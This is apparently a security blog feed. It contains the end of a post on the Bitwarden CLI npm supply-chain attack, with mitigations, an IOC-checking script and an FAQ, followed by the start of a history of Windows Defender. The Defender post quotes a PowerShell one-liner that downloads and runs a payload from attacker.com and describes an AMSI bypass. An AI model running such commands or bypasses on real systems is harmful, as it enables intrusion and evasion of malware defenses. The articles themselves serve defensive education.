&lt;p&gt;When a poisoned GitHub Action injects malicious code during the build, the resulting package has valid provenance. Current tools can only detect this after publication -- by analyzing the published artifact&apos;s behavior. The gap between &quot;build starts&quot; and &quot;malicious artifact reaches consumers&quot; is the critical window.&lt;/p&gt;
&lt;p&gt;Emerging approaches include reproducible builds (where independent rebuilders verify that source produces identical artifacts), workflow diffing (alerting when publish workflows change between runs), and multi-party signing (requiring multiple independent build systems to attest before publication). A stronger Actions-specific SLSA profile would require the build platform to verify that no workflow step injected unexpected files -- but defining &quot;unexpected&quot; without breaking legitimate build customization remains unsolved.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Real-time malware detection at registry scale.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The Bitwarden attack lasted 93 minutes. JFrog and Socket detected it within that window -- impressive, but 334 developers still installed it. True protection requires detection &lt;em&gt;before&lt;/em&gt; the first consumer downloads a compromised package. npm processes tens of thousands of new package versions daily [@npm-all-packages], demanding near-instant behavioral analysis at enormous scale.&lt;/p&gt;
&lt;p&gt;Current approaches include OpenSSF Package Analysis [@openssf-pkg-analysis] (which runs packages in sandboxed VMs and monitors syscalls), Socket&apos;s static heuristics (sub-second but limited to known patterns), and ML-based anomaly detection (identifying packages whose behavior diverges from their previous versions). A reasonable target: under 60 seconds from publish to verdict -- fast enough that even automated CI pipelines would not install before scanning completes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Preventing credential propagation in self-replicating worms.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Shai-Hulud&apos;s self-propagation relies on harvesting long-lived credentials (npm tokens, GitHub PATs) from developer environments. Short-lived OIDC tokens help, but developer workstations still contain persistent credentials by necessity.&lt;/p&gt;
&lt;p&gt;The open question: can we architect a development workflow where no single compromised machine provides enough credentials to propagate further? Proposals include publish rate-limiting (flagging accounts that suddenly publish dozens of packages), cooling-off periods for new versions of popular packages, and anomaly detection on publish patterns -- distinguishing a legitimate monorepo release (publishing 20 related packages at once) from worm-driven mass publication.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Balancing developer velocity with install-time security.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;--ignore-scripts&lt;/code&gt; flag would have prevented this attack entirely by blocking the &lt;code&gt;preinstall&lt;/code&gt; hook. But many legitimate packages rely on install scripts for native compilation (node-gyp), platform-specific binary downloads, and post-install configuration. A blanket ban breaks real workflows.&lt;/p&gt;
&lt;p&gt;The unsolved problem is granular script authorization -- allowing known-safe hooks while blocking unknown ones. Deno&apos;s explicit permission model (&lt;code&gt;--allow-net&lt;/code&gt;, &lt;code&gt;--allow-read&lt;/code&gt;) offers inspiration: what if npm install scripts declared their required capabilities (network access, file paths, environment variables) and the package manager enforced those declarations? WASI-based isolation could sandbox install scripts with fine-grained capability restrictions, but the migration cost for existing packages is enormous.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. AI-generated code introducing supply chain blind spots.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The attack specifically targeted AI tool configurations. As AI agents increasingly manage dependencies, write code, and execute builds, they become a new trust boundary. An AI agent that trusts its own configuration files creates a recursive vulnerability -- compromise the config, compromise the agent, compromise everything the agent touches.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; TeamPCP operates across international borders. Dataminr links them to the Vect ransomware-as-a-service operation [@dataminr-teampcp], but law enforcement attribution and prosecution remain difficult when threat actors operate from jurisdictions that do not cooperate on cybercrime. The next generation of attacks is already being planned by groups with ransomware-level resources.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;These problems are not merely academic -- they represent the next battleground. But what can you do today, before they are solved?&lt;/p&gt;
&lt;h2&gt;Practical Guide -- Defending Your Pipeline Today&lt;/h2&gt;
&lt;p&gt;Theory and open problems aside, here are the concrete steps you can take today to avoid being the next victim.&lt;/p&gt;
&lt;h3&gt;Immediate Actions (Today)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Pin GitHub Actions by commit SHA, not tag.&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-yaml&quot;&gt;# BAD: mutable tag can be redirected
uses: actions/checkout@v4

# GOOD: immutable commit SHA
uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This single change would have prevented the tj-actions attack and would make CI/CD pipeline poisoning significantly harder [@cisa-tj-actions].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Use &lt;code&gt;npm ci --ignore-scripts&lt;/code&gt; in CI pipelines.&lt;/strong&gt; Then allowlist specific scripts explicitly in your &lt;code&gt;.npmrc&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-ini&quot;&gt;# .npmrc
ignore-scripts=true
# After ignore-scripts=true, run needed scripts manually: npm rebuild &amp;lt;package&amp;gt;
script-shell=/bin/bash
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Run &lt;code&gt;npm audit signatures&lt;/code&gt;&lt;/strong&gt; to verify that installed packages have valid provenance attestations from their expected source repositories.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Enable branch-level OIDC token restrictions&lt;/strong&gt; in your repository settings to prevent publish tokens from being minted on non-main branches.&lt;/p&gt;
&lt;h3&gt;Short-Term Actions (This Quarter)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Adopt Socket or equivalent behavioral scanning for your dependency installs&lt;/li&gt;
&lt;li&gt;Deploy StepSecurity Harden-Runner in audit mode on all CI/CD workflows&lt;/li&gt;
&lt;li&gt;Implement automated secret rotation -- no credential should live longer than 24 hours in CI&lt;/li&gt;
&lt;li&gt;Audit all third-party GitHub Actions in your workflows against their source repositories&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Medium-Term Actions (This Year)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Achieve SLSA Build Level 3 for any packages you publish&lt;/li&gt;
&lt;li&gt;Replace all long-lived npm tokens with OIDC-based trusted publishing&lt;/li&gt;
&lt;li&gt;Restrict GitHub Action permissions to absolute minimum required per job&lt;/li&gt;
&lt;li&gt;Implement environment-based deployment gates with required reviewer approval&lt;/li&gt;
&lt;/ul&gt;

1. **Rotate ALL credentials immediately:** AWS access keys, Azure service principals, GCP service accounts, GitHub PATs, npm tokens, SSH keys
2. **Check for unauthorized workflows:** Search all your repositories for workflow files you did not create
3. **Search for artifacts:** Look for `bw_setup.js`, `bw1.js`, or network connections to `audit.checkmarx[.]cx` in your logs
4. **Review GitHub audit log:** Check for unexpected repository creation, especially repos with Dune-themed names
5. **Scan AI tool configs:** Check `.claude.json`, `.kiro`, and Cursor settings for modifications
6. **Notify your security team:** This is a credential compromise -- treat it as a full-blown incident requiring forensic investigation
&lt;p&gt;{`
// Indicators of Compromise (IOC) checker for Bitwarden CLI attack
const fs = require(&apos;fs&apos;);
const path = require(&apos;path&apos;);
const os = require(&apos;os&apos;);&lt;/p&gt;
&lt;p&gt;const iocs = {
  files: [&apos;bw_setup.js&apos;, &apos;bw1.js&apos;],
  domains: [&apos;audit.checkmarx.cx&apos;]
};&lt;/p&gt;
&lt;p&gt;console.log(&apos;=== Bitwarden CLI IOC Scanner ===\n&apos;);&lt;/p&gt;
&lt;p&gt;// Check for malicious files in common locations
const searchDirs = [
  path.join(os.homedir(), &apos;.npm&apos;),
  path.join(os.homedir(), &apos;node_modules&apos;),
  &apos;/tmp&apos;
];&lt;/p&gt;
&lt;p&gt;let found = false;
for (const dir of searchDirs) {
  for (const file of iocs.files) {
    const filePath = path.join(dir, file);
    if (fs.existsSync(filePath)) {
      console.log(&apos;[!] FOUND malicious file: &apos; + filePath);
      found = true;
    }
  }
}&lt;/p&gt;
&lt;p&gt;// Check shell history for C2 domain
const historyFiles = [&apos;.bash_history&apos;, &apos;.zsh_history&apos;];
for (const hist of historyFiles) {
  const histPath = path.join(os.homedir(), hist);
  if (fs.existsSync(histPath)) {
    const content = fs.readFileSync(histPath, &apos;utf8&apos;);
    for (const domain of iocs.domains) {
      if (content.includes(domain)) {
        console.log(&apos;[!] C2 domain found in &apos; + hist);
        found = true;
      }
    }
  }
}&lt;/p&gt;
&lt;p&gt;if (!found) {
  console.log(&apos;[OK] No indicators of compromise detected.&apos;);
  console.log(&apos;     Note: This checks common locations only.&apos;);
  console.log(&apos;     A full forensic scan may still be warranted.&apos;);
}
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If every team in the world pinned their GitHub Actions by commit SHA and ran &lt;code&gt;npm ci --ignore-scripts&lt;/code&gt; in CI, both the tj-actions and Bitwarden CLI attacks would have been prevented. These two changes cost nothing and take minutes to implement.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Frequently Asked Questions&lt;/h2&gt;

No. The attack only affected the npm package `@bitwarden/cli` version 2026.4.0, distributed exclusively through the npm registry. The Bitwarden browser extensions, desktop applications, mobile apps, and web vault were not affected. No password vault data was compromised -- only the npm distribution path for the CLI tool was poisoned during the 93-minute window [@bitwarden-statement].

No. Bitwarden confirmed that no vault data, production systems, or cloud infrastructure was accessed [@bitwarden-statement]. The malicious package targeted developer credentials (AWS, GitHub, npm tokens, SSH keys) on the machines where it was installed -- it did not interact with or access any Bitwarden vault data.

No. Provenance guarantees origin, not safety. When the CI/CD pipeline itself is compromised, the attestation is technically valid for a malicious build. See the analysis in &quot;State of the Art&quot; and &quot;Theoretical Limits&quot; for a full explanation of why provenance alone cannot prevent pipeline-level attacks [@stepsecurity-bitwarden].

No. npm remains the standard JavaScript package manager with strong security investments. The correct response is defense in depth: pin Actions by SHA, use lockfiles with `npm ci`, run behavioral analysis tools like Socket, and monitor your CI/CD runtime with tools like Harden-Runner. No package registry is immune to supply chain attacks -- the defenses described in this article apply to PyPI, RubyGems, and other registries too.

The domain `audit.checkmarx[.]cx` was a deliberate impersonation of the legitimate Checkmarx application security company. The real Checkmarx&apos;s GitHub Action (`checkmarx/ast-github-action`) was compromised as part of the attack, but Checkmarx (the company) was a victim -- not a participant. The threat actor exploited both the action and the brand association to make exfiltration traffic appear legitimate.

Look for: unexpected outbound network connections during builds (use Harden-Runner), new files appearing in your build artifacts that are not in your source repository, workflow runs that take significantly longer than usual, and unauthorized changes to your workflow files. Run `npm audit signatures` on your published packages and verify the provenance matches your expected build system. Monitor your GitHub audit log for unexpected token usage.

The threat actor group TeamPCP named their npm worm campaign &quot;Shai-Hulud&quot; after the giant sandworms in Frank Herbert&apos;s science fiction novel Dune. The data exfiltration repositories used Dune-themed names (sardaukar, fremen, atreides, sandworm). The Bitwarden CLI attack was internally designated &quot;Shai-Hulud: The Third Coming&quot; -- the third major iteration of this self-propagating campaign, following the original September 2025 and November 2025 waves [@jfrog-analysis].
&lt;h2&gt;The Trust Paradox&lt;/h2&gt;
&lt;p&gt;Software supply chains are built on trust. Every &lt;code&gt;npm install&lt;/code&gt; is an act of faith -- faith that the package name resolves correctly, that the maintainer is who they claim to be, that the build system executed faithfully, that the registry served what was published, that no step in the chain was silently subverted.&lt;/p&gt;
&lt;p&gt;The Bitwarden attack revealed the recursive nature of this trust:&lt;/p&gt;

flowchart TD
    A[You trust packages] --&amp;gt; B[Built by pipelines]
    B --&amp;gt; C[Using GitHub Actions]
    C --&amp;gt; D[Maintained by developers]
    D --&amp;gt; E[With credentials]
    E --&amp;gt; F[Stored in systems]
    F --&amp;gt; G[Protected by other packages]
    G --&amp;gt; A
&lt;p&gt;The Bitwarden attack struck at the credentials level -- proving that when any single link in this circular chain breaks, the entire chain fails silently. The provenance was valid. The signatures checked out. The trust system confirmed what the trust system had been told.&lt;/p&gt;
&lt;p&gt;The 334 developers who installed that package were not victims of carelessness. They ran the official package name from the official registry with official attestation. They did everything right by every standard that existed. The system -- not the developers -- failed them.&lt;/p&gt;
&lt;p&gt;The way forward is not defense in trust. It is defense in depth: multiple independent verification layers, each assuming every other layer might be compromised. Behavioral analysis that does not trust provenance. Runtime monitoring that does not trust behavioral analysis. Human review that does not trust automated scanning. Redundancy, skepticism, and speed.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The fundamental lesson of the Bitwarden CLI attack is not &quot;trusted publishing failed&quot; -- it is that trust itself is the wrong foundation for security. Every verification mechanism must assume that every other verification mechanism might be compromised. Defense in depth is not a luxury -- it is the only architecture that survives a world where the tools that protect you can be turned against you.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The next Shai-Hulud is already being planned. Its authors watched how this attack was detected in 93 minutes and are working to reduce their observable footprint. The question is not whether the next attack will come -- it is whether your defenses will catch it in the first seconds, not the first hour.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;bitwarden-cli-supply-chain-attack&quot; keyTerms={[
  { term: &quot;Supply chain attack&quot;, definition: &quot;Attack targeting the software delivery pipeline rather than the final application&quot; },
  { term: &quot;Trusted publishing&quot;, definition: &quot;OIDC-based npm publishing where packages are published exclusively through verified CI/CD pipelines&quot; },
  { term: &quot;SLSA&quot;, definition: &quot;Supply-chain Levels for Software Artifacts -- framework defining build integrity levels L0-L3&quot; },
  { term: &quot;Provenance attestation&quot;, definition: &quot;Cryptographically signed record linking a published package to its source and build system&quot; },
  { term: &quot;Dependency confusion&quot;, definition: &quot;Attack exploiting package manager resolution priority between public and private registries&quot; },
  { term: &quot;Self-propagating worm&quot;, definition: &quot;Malware that spreads autonomously by harvesting credentials and infecting other packages&quot; },
  { term: &quot;GitHub Actions OIDC&quot;, definition: &quot;Short-lived token mechanism allowing workflows to authenticate without stored secrets&quot; },
  { term: &quot;Rice&apos;s Theorem&quot;, definition: &quot;Proof that no algorithm can decide all non-trivial semantic properties of programs&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>supply-chain-security</category><category>npm</category><category>bitwarden</category><category>github-actions</category><category>ci-cd</category><category>shai-hulud</category><category>oidc</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Defender&apos;s Dilemma: How Microsoft Won the Antivirus War It Can Never Finish</title><link>https://paragmali.com/blog/the-defenders-dilemma-microsoft-antivirus/</link><guid isPermaLink="true">https://paragmali.com/blog/the-defenders-dilemma-microsoft-antivirus/</guid><description>From scoring 0.5/6 in AV-TEST to 100% MITRE detection with zero false positives -- the 20-year transformation of Windows Defender.</description><pubDate>Wed, 29 Apr 2026 00:00:00 GMT</pubDate><content:encoded>
**Windows Defender went from scoring 0.5/6 in AV-TEST protection testing (2012) to top-tier MITRE ATT&amp;amp;CK Enterprise results with zero false positives (2024).** The transformation happened through four generational leaps: cloud-delivered ML protection, AMSI for fileless malware visibility, EDR for post-breach detection, and unified XDR across endpoints, email, identity, and cloud. Despite this, Fred Cohen&apos;s 1986 dissertation establishes that perfect malware detection is mathematically impossible -- every endpoint protection system, including Defender, operates within this theoretical ceiling.
&lt;h2&gt;From Zero to Hero&lt;/h2&gt;
&lt;p&gt;In October 2012, AV-TEST -- the world&apos;s most respected independent antivirus testing lab -- published results that should have embarrassed Microsoft into silence. Windows Defender, the antivirus built into Windows 8, scored 0.5 out of 6.0 for malware protection [@av-test]. Dead last among 25 products tested. Worse than free tools from startups nobody had heard of.&lt;/p&gt;
&lt;p&gt;Twelve years later, the lineage that began with Windows Defender sat inside Microsoft Defender XDR, a cross-domain security suite that achieved top-tier 2024 MITRE ATT&amp;amp;CK Enterprise results with zero false positives [@mitre-2024]. For the sixth consecutive year, Gartner named Microsoft a Leader in Endpoint Protection Platforms [@gartner-epp-2025].&lt;/p&gt;
&lt;p&gt;This is the story of how that happened -- and why, despite the transformation, the war can never be won.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A product that scored dead last in independent testing in 2012 became an industry leader by 2024. The reversal was not incremental improvement -- it was a complete architectural revolution spanning cloud ML, behavioral analysis, and cross-domain correlation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To understand how Defender reached this point, we need to go back to the moment when Microsoft was forced to care about security -- not because they wanted to, but because worms were literally attacking their own update servers.&lt;/p&gt;
&lt;h2&gt;Historical Origins: The Trustworthy Computing Pivot&lt;/h2&gt;
&lt;p&gt;On August 11, 2003, the Blaster worm infected hundreds of thousands of Windows PCs [@ms03-026]. It carried a message embedded in its code: &quot;billy gates why do you make this possible ? Stop making money and fix your software!!&quot;The Blaster worm&apos;s embedded taunt -- &quot;billy gates why do you make this possible ? Stop making money and fix your software!!&quot; -- became one of the most quoted lines in malware history. It captured the frustration millions of users felt with Windows security in the early 2000s.&lt;/p&gt;
&lt;p&gt;The answer had actually begun 18 months earlier. On January 15, 2002, Bill Gates sent an internal memo to every Microsoft employee that would reshape the company&apos;s entire engineering culture.&lt;/p&gt;

Trustworthy Computing is the highest priority for all the work we are doing. -- Bill Gates, January 15, 2002 [@gates-memo]
&lt;p&gt;Gates&apos; memo came in response to a cascade of security catastrophes. In July 2001, the Code Red worm tore through hundreds of thousands of IIS web servers, defacing websites and launching DDoS attacks against whitehouse.gov [@cert-code-red]. Weeks later, the Nimda worm used five distinct propagation methods -- email, network shares, web servers, browser exploits, and back doors left by Code Red II -- causing massive infrastructure disruption [@cert-nimda]. Coming days after September 11, Nimda heightened the sense of digital infrastructure vulnerability across the United States.&lt;/p&gt;

Microsoft&apos;s company-wide security pivot initiated by Bill Gates&apos; January 2002 memo. It paused Windows development for security audits, created the Security Development Lifecycle (SDL), and led to the creation of the Security Technology Unit that would eventually build Windows Defender.
&lt;p&gt;Then came Blaster (2003), which exploited a known RPC buffer overflow to crash millions of Windows systems and attempted a DDoS attack against windowsupdate.com -- Microsoft&apos;s own patching infrastructure [@ms03-026]. Sasser followed in April 2004, a self-propagating worm written by an 18-year-old German student that required no user interaction and took down hospitals, airlines, and banks worldwide [@ms04-011].&lt;/p&gt;
&lt;p&gt;The first tangible fruit of Gates&apos; memo was Windows XP Service Pack 2 (August 2004), which enabled Windows Firewall by default, introduced the Security Center, and added Data Execution Prevention [@wp-xp-sp2]. But the worms were only half the problem. By 2004, studies estimated 67% of home PCs were infected with spyware -- browser hijackers, bundled toolbars, and adware installed without informed consent.&lt;/p&gt;
&lt;p&gt;Microsoft needed an antispyware tool, and they needed it fast. In December 2004, they acquired GIANT Company Software and its GIANT AntiSpyware product [@giant-acquisition]. Within a month, Microsoft released it as Microsoft AntiSpyware Beta [@wp-defender]. By 2006, it was rebranded as Windows Defender; it shipped with Vista in January 2007 [@wp-defender].&lt;/p&gt;
&lt;p&gt;Microsoft now had an antispyware tool -- but spyware was only half the problem. Viruses, trojans, and worms were still devastating Windows systems, and Defender 1.0 couldn&apos;t detect any of them.&lt;/p&gt;
&lt;h2&gt;Early Approaches: Signatures and Their Limits&lt;/h2&gt;
&lt;p&gt;Windows Defender 1.0 shipped with Vista in January 2007, and it could scan your PC for spyware. Just spyware. Not viruses. Not trojans. Not ransomware. It was like selling a house with a lock on the front door and no walls.&lt;/p&gt;

A malware identification technique that compares files against a database of known malware &quot;signatures&quot; -- cryptographic hashes and byte-pattern rules. Fast and precise for known threats, but fundamentally reactive: a new malware sample must be captured, analyzed, and signed before protection applies.
&lt;p&gt;The detection engine worked through simple pattern matching. On access or during scheduled scans, files were hashed and compared against a curated signature database delivered through Windows Update. Hash-based lookups ran in $O(n)$ time (where $n$ = files scanned), while pattern-matching rules against the full signature database ran in $O(n \times m)$ (where $m$ = pattern count). Space was proportional to the database -- tens of megabytes.&lt;/p&gt;
&lt;p&gt;The approach had a fatal structural weakness: it was purely reactive. A new spyware sample had to be captured, analyzed, signed, and distributed before any endpoint received protection. Average time-to-signature was hours to days. And polymorphic malware -- code that changes its binary representation on every infection -- rendered signatures nearly useless.Windows Live OneCare (2006--2009) was Microsoft&apos;s first attempt at a paid consumer security suite [@wp-defender]. It bundled antivirus, firewall, backup, and PC tune-up into a subscription product. It flopped: poor detection rates, low market share against Norton and McAfee, and Microsoft&apos;s eventual realization that free, universal security was the only path forward. OneCare was discontinued June 30, 2009.&lt;/p&gt;
&lt;p&gt;A polymorphic variant of the Vundo trojan (2007--2008) illustrated the problem perfectly [@wp-defender]. Vundo repacked itself on every infection, generating a unique binary hash each time. Defender&apos;s signature database couldn&apos;t keep pace with the variant generation rate. Users were infected despite having &quot;protection&quot; enabled.&lt;/p&gt;
&lt;p&gt;Microsoft knew signatures alone were a losing game. In September 2009, they released Microsoft Security Essentials (MSE) -- a free standalone antivirus for Windows XP, Vista, and 7 that added virus detection alongside the spyware scanning [@wp-defender]. MSE replaced the failed OneCare product and proved Microsoft could build a competent, if basic, AV engine.&lt;/p&gt;
&lt;p&gt;Then came the merger that seemed like a triumph. Windows 8 (October 2012) absorbed MSE&apos;s antivirus capabilities directly into Defender, creating the first Windows version with built-in, always-on antivirus protection. Every Windows PC would finally have real antivirus from the moment of installation.&lt;/p&gt;
&lt;p&gt;Problem solved? Not even close. The independent labs were about to deliver a devastating verdict.&lt;/p&gt;
&lt;h2&gt;The Humiliation: Worst-in-Class Scores&lt;/h2&gt;
&lt;p&gt;When Windows 8 shipped in October 2012 with Defender built in, it seemed like a structural win -- every Windows PC would finally have antivirus protection by default. Then the test results came in.&lt;/p&gt;
&lt;p&gt;AV-TEST&apos;s October 2012 evaluation scored Windows Defender 0.5 out of 6.0 for the aggregate Protection category -- the worst score among all 25 products tested [@av-test]. In that testing period, it missed a significant proportion of real-world malware samples that competitors caught routinely. Across 2012--2014, Defender protection scores hovered between 0.5 and 2.0 out of 6.0 -- near the bottom of every independent test.&lt;/p&gt;

gantt
    title Defender AV-TEST Protection Score Progression
    dateFormat YYYY
    axisFormat %Y
    section Protection Score
    0.5-2.0/6 (Worst tier)       :crit, 2012, 2015
    3.0-4.5/6 (Improving)        :active, 2015, 2017
    5.0-5.5/6 (Competitive)      :active, 2017, 2019
    6.0/6 (Top tier, consistent) :done, 2019, 2026
&lt;p&gt;The industry&apos;s verdict was damning. Security analysts described Defender as &quot;baseline protection&quot; -- polite language for &quot;better than nothing, barely.&quot; CryptoLocker ransomware arrived in September 2013, encrypting users&apos; files and demanding ransom payment [@wp-cryptolocker]. Signature-based Defender couldn&apos;t detect it until days after initial distribution, by which time hundreds of thousands of PCs were already compromised.CrowdStrike, founded in 2011 by George Kurtz, Dmitri Alperovitch, and Gregg Marston [@wp-crowdstrike], was building a fundamentally different approach during this period -- a cloud-native, agent-based EDR platform that would become Defender&apos;s most formidable competitor.&lt;/p&gt;
&lt;p&gt;Meanwhile, the competitive field was shifting. Norton, McAfee, and Kaspersky still dominated the traditional AV market. But new cloud-native challengers were emerging. CrowdStrike launched its Falcon platform commercially around 2013--2014, betting on cloud-delivered threat intelligence and behavioral detection [@wp-crowdstrike]. SentinelOne, also founded in 2013 [@wp-sentinelone], wagered on autonomous on-device AI.&lt;/p&gt;
&lt;p&gt;But here&apos;s the structural insight that Microsoft&apos;s leadership grasped: integration was right. Universal-default protection was right. The detection engine was wrong. The question became whether Microsoft could revolutionize the detection engine without undoing the universal-default advantage.&lt;/p&gt;
&lt;p&gt;The answer would come from the cloud.&lt;/p&gt;
&lt;h2&gt;The Breakthrough: Cloud, AMSI, and Machine Learning&lt;/h2&gt;
&lt;p&gt;Between 2015 and 2018, Microsoft executed the fastest architectural transformation in antivirus history. In four years, Defender went from a signature-based scanner to a cloud-powered, ML-driven, behavior-aware platform. The key insight: stop scanning files. Start understanding behavior.&lt;/p&gt;
&lt;h3&gt;Cloud-Delivered Protection and Block at First Sight&lt;/h3&gt;

A detection architecture where unknown files on an endpoint are analyzed in real-time by cloud-based machine learning models. The endpoint sends file metadata and samples to the cloud, which returns a verdict (malicious, clean, or unknown) typically within milliseconds.
&lt;p&gt;Windows 10 (July 2015) connected Defender to Microsoft&apos;s Azure cloud for real-time verdicts [@cloud-protection]. When an endpoint encounters an unknown file, Defender sends its metadata to the cloud service. Cloud ML models -- including gradient-boosted tree ensembles and deep neural networks -- analyze the sample and return a classification [@ml-pipeline].&lt;/p&gt;

A Defender feature that holds unknown files from execution until the cloud returns a verdict. If the cloud classifies the file as malicious, it is blocked and quarantined before the user is ever exposed. This reduces zero-day exposure from hours (waiting for signature updates) to milliseconds.
&lt;p&gt;The real breakthrough came with Block at First Sight (BAFS), introduced with the Windows 10 Anniversary Update in 2016 and expanded through later cloud-protection improvements [@wp-defender, @bafs-blog]. When Defender encounters a file it has never seen before, BAFS holds it -- preventing execution -- while the cloud runs its ML pipeline. The verdict comes back in milliseconds to seconds. If malicious, the file is quarantined. If clean, execution proceeds. The user never notices the delay.&lt;/p&gt;

Approximately 96% of all malware files detected and blocked by Windows Defender Antivirus (Windows Defender AV) are observed only once on a single computer. -- Microsoft Security Blog, 2017 [@bafs-blog]
&lt;p&gt;That statistic -- 96% of malware is unique to a single endpoint -- explains why signatures were doomed. You can&apos;t write a signature for something you&apos;ve never seen. But you can train a model on billions of samples and classify new variants in real time.&lt;/p&gt;

sequenceDiagram
    participant User as User
    participant Endpoint as Defender Endpoint
    participant Cloud as Microsoft Cloud
    participant ML as ML Models
    User-&amp;gt;&amp;gt;Endpoint: Opens unknown file
    Endpoint-&amp;gt;&amp;gt;Endpoint: Local signature check (miss)
    Endpoint-&amp;gt;&amp;gt;Endpoint: On-device ML (uncertain)
    Endpoint-&amp;gt;&amp;gt;Cloud: Send file metadata + sample
    Note over Endpoint: File held from execution
    Cloud-&amp;gt;&amp;gt;ML: Gradient-boosted trees + DNN
    ML-&amp;gt;&amp;gt;Cloud: Verdict: MALICIOUS
    Cloud-&amp;gt;&amp;gt;Endpoint: Block verdict
    Endpoint-&amp;gt;&amp;gt;User: File quarantined
    Note over Cloud: Verdict shared to all endpoints
&lt;p&gt;The feedback loop was the key multiplier. With over a billion Windows endpoints feeding telemetry into the cloud, every new threat detected on one machine instantly protected every other machine in the network. The entire Windows install base became a collective immune system.&lt;/p&gt;
&lt;h3&gt;AMSI: Seeing Through Obfuscation&lt;/h3&gt;

A Windows API introduced in Windows 10 (2015) that allows script engines -- PowerShell, VBA, JavaScript, VBScript -- to submit content to the registered antimalware provider for scanning after deobfuscation but before execution. AMSI closes the fileless malware blind spot by inspecting code at the semantic layer rather than the file layer.
&lt;p&gt;Cloud-delivered protection solved the &quot;never-before-seen file&quot; problem. But what about attacks that don&apos;t use files at all?&lt;/p&gt;
&lt;p&gt;By 2015, attackers had discovered that PowerShell could execute entire attack frameworks entirely in memory. The PowerShell Empire framework, widely adopted from 2015 onward, could download and execute a malicious payload with a single command -- &lt;code&gt;IEX (New-Object Net.WebClient).DownloadString(&apos;http://attacker.com/payload.ps1&apos;)&lt;/code&gt; -- without ever writing a file to disk. Defender&apos;s file-scanning engine never had an opportunity to inspect the payload.&lt;/p&gt;
&lt;p&gt;AMSI addressed this by creating an interface at the script execution layer [@amsi-docs]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A script engine (PowerShell 5.0+, VBA, JavaScript) processes a script block&lt;/li&gt;
&lt;li&gt;Before execution, the engine calls &lt;code&gt;AmsiScanBuffer()&lt;/code&gt;, passing the &lt;strong&gt;deobfuscated&lt;/strong&gt; content to AMSI&lt;/li&gt;
&lt;li&gt;AMSI routes the content to the registered antimalware provider (Defender)&lt;/li&gt;
&lt;li&gt;Defender scans the content against signatures, heuristics, and ML models&lt;/li&gt;
&lt;li&gt;If malicious, execution is blocked and an event is logged&lt;/li&gt;
&lt;/ol&gt;

sequenceDiagram
    participant Script as PowerShell Script
    participant Engine as PowerShell Engine
    participant AMSI as AMSI Interface
    participant Defender as Windows Defender
    Script-&amp;gt;&amp;gt;Engine: Encoded/obfuscated payload
    Engine-&amp;gt;&amp;gt;Engine: Deobfuscate script block
    Engine-&amp;gt;&amp;gt;AMSI: AmsiScanBuffer(deobfuscated content)
    AMSI-&amp;gt;&amp;gt;Defender: Route to registered provider
    Defender-&amp;gt;&amp;gt;Defender: Signature + ML scan
    alt Malicious
        Defender-&amp;gt;&amp;gt;AMSI: AMSI_RESULT_DETECTED
        AMSI-&amp;gt;&amp;gt;Engine: Block execution
        Engine-&amp;gt;&amp;gt;Script: Execution prevented
    else Clean
        Defender-&amp;gt;&amp;gt;AMSI: AMSI_RESULT_CLEAN
        AMSI-&amp;gt;&amp;gt;Engine: Allow execution
        Engine-&amp;gt;&amp;gt;Script: Script executes
    end
&lt;p&gt;The word &quot;deobfuscated&quot; is the key. Attackers routinely obfuscated their PowerShell scripts with multiple layers of encoding -- Base64, XOR, string concatenation, variable substitution. By the time AMSI sees the content, the script engine has already resolved all that obfuscation down to the actual commands. AMSI scans what the code &lt;em&gt;does&lt;/em&gt;, not what it &lt;em&gt;looks like&lt;/em&gt; [@powershell-blue-team].&lt;/p&gt;

AMSI had a fundamental architectural vulnerability: it runs in user-mode, inside the process it&apos;s monitoring. That means user-mode code can tamper with AMSI&apos;s in-process state. By 2016, a widely cited PowerShell reflection technique could set `amsiInitFailed` to `true`, causing all subsequent AMSI scans to return &quot;not detected&quot; [@graeber-amsi-bypass]. While Microsoft signatured this specific bypass, the underlying issue -- that AMSI is accessible to the code it inspects -- has spawned an ongoing arms race of bypass variants and countermeasures.

A widely cited AMSI bypass technique was elegant in its simplicity: one line of PowerShell reflection that flipped an internal flag. It demonstrated a deeper truth about user-mode security boundaries -- they are speed bumps, not walls.
&lt;h3&gt;The ML Pipeline&lt;/h3&gt;
&lt;p&gt;Behind both cloud protection and AMSI sits a multi-layered machine learning pipeline [@ml-pipeline]:&lt;/p&gt;
&lt;ol&gt;
